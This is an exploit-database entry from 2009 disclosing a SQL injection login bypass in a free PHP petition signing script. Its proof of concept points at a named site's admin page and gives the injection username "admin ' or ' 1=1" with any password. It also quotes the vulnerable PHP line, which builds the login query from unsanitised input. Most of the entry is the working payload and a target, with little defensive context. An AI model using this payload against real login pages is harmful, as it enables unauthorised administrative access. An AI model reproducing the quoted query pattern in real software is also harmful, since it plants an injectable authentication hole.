Free PHP Petition Signing Script (Auth Bypass) SQL Injection Vuln

2009-03-27T00:00:00
ID 1337DAY-ID-4965
Type zdt
Reporter Qabandi
Modified 2009-03-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Free PHP Petition Signing Script (Auth Bypass) SQL Injection Vuln
=================================================================



######################################################
#	Free PHP Petition Signing Script Release     #
# 		Login SQL injection	 	     #
######################################################
                From Kuwait, Peace.
######################################################
Download: http://www.rediscussed.com/2008/01/18/free-php-petition-signing-script-release/
------------------------------------------------------
-:PoC:-


http://usa-homeland.org/pet/signing_system-admin

Username: admin ' or ' 1=1
Password: nothing


------------vuln--code---------(./signing_system-admin/index.php)

$query = mysql_query("SELECT username,password FROM `accounts` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());

------------------------------------



#  0day.today [2018-04-08]  #